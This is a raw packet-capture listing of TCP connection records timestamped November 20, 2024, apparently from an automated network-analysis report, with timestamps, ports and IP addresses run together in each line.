                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.401711941 CET4434995513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.415513992 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.420361042 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.420381069 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.421673059 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.421768904 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.423482895 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.423563957 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.427174091 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.427174091 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.427194118 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.427227020 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.451869965 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.452130079 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.452147007 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.452511072 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.452836990 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.452904940 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.453016043 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.469985008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470001936 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470016003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470032930 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470046997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470062971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470065117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470078945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470097065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470098972 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470113039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470124006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470140934 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470164061 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.471064091 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.471079111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.471128941 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.471189022 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.471394062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.471530914 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.473515987 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.473553896 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.474016905 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.474025011 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.477720976 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.477803946 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.477880955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.477926970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.478889942 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.478988886 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.479110956 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.479924917 CET49942443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.479938030 CET4434994220.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.485363960 CET49956443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.485383987 CET4434995620.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.485569954 CET49956443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.485760927 CET49956443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.485771894 CET4434995620.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.499336004 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.545581102 CET49956443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.545782089 CET49945443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.545840025 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.545880079 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.545926094 CET44349935172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.545962095 CET44349934172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.545970917 CET49935443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.546006918 CET49954443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.546030998 CET49934443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.546127081 CET49947443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.546190977 CET49948443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.546260118 CET49950443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.546278954 CET49949443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.546336889 CET49951443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547502995 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547533989 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547643900 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547673941 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547673941 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547779083 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547807932 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547816992 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547861099 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547940016 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.547970057 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548057079 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548083067 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548096895 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548140049 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548182964 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548192024 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548402071 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548408985 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548427105 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548454046 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548583984 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548593044 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548645973 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548882008 CET49958443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.548894882 CET4434995823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549000978 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549011946 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549082041 CET49959443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549093008 CET4434995923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549174070 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549185991 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549264908 CET49961443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549278975 CET4434996123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549760103 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549772024 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549859047 CET49962443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.549870014 CET4434996223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.550456047 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.550467014 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.551500082 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.551507950 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.551635027 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.551794052 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.551804066 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.565234900 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.565299988 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.565371990 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.567579031 CET49944443192.168.2.618.238.49.52
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.567590952 CET4434994418.238.49.52192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.578970909 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.579176903 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.579221964 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.579272985 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.587327957 CET4434995413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.587336063 CET4434994520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.591322899 CET4434995023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.591325045 CET4434994723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.591325998 CET4434994823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.591331959 CET4434995620.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.591331959 CET4434994923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.591336012 CET4434995123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596685886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596702099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596749067 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596771002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596802950 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596818924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596834898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596841097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596858025 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596877098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596914053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.596950054 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.597568989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.597584009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.597599983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.597605944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.597621918 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.597640038 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.597945929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598179102 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598396063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598411083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598426104 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598448992 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598484993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598973989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.598988056 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599004030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599014044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599020958 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599029064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599045992 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599061012 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599777937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599793911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599838972 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599884033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599900007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599920988 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.599947929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.600692034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.600784063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.600799084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.600815058 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.600826025 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.600853920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.616841078 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.616869926 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.616928101 CET49943443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.616935015 CET4434994313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.627573013 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.642723083 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.642756939 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.642819881 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.644687891 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.644701004 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.652738094 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.652990103 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.653474092 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.655771971 CET49941443192.168.2.620.189.173.9
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.655792952 CET4434994120.189.173.9192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.670937061 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.670978069 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.671241999 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.672086000 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.672116041 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.705919027 CET4434994823.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.705993891 CET49948443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.706280947 CET4434995023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.706330061 CET49950443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.707093954 CET4434995123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.707254887 CET4434995123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.707308054 CET49951443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.712136984 CET49951443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.714654922 CET4434994923.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.714754105 CET49949443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727193117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727207899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727277994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727716923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727768898 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727821112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727835894 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727861881 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.727875948 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728005886 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728022099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728039026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728063107 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728095055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728770018 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728785992 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728802919 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728816032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728835106 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.728857040 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729460955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729477882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729495049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729504108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729516983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729528904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729610920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.729656935 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.730330944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.730348110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.730365992 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.730372906 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.730384111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.730398893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.730555058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.731412888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.731426954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.731443882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.731453896 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.731461048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.731484890 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.731502056 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732095003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732110977 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732126951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732150078 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732177019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732325077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732978106 CET8049910185.215.113.206192.168.2.6
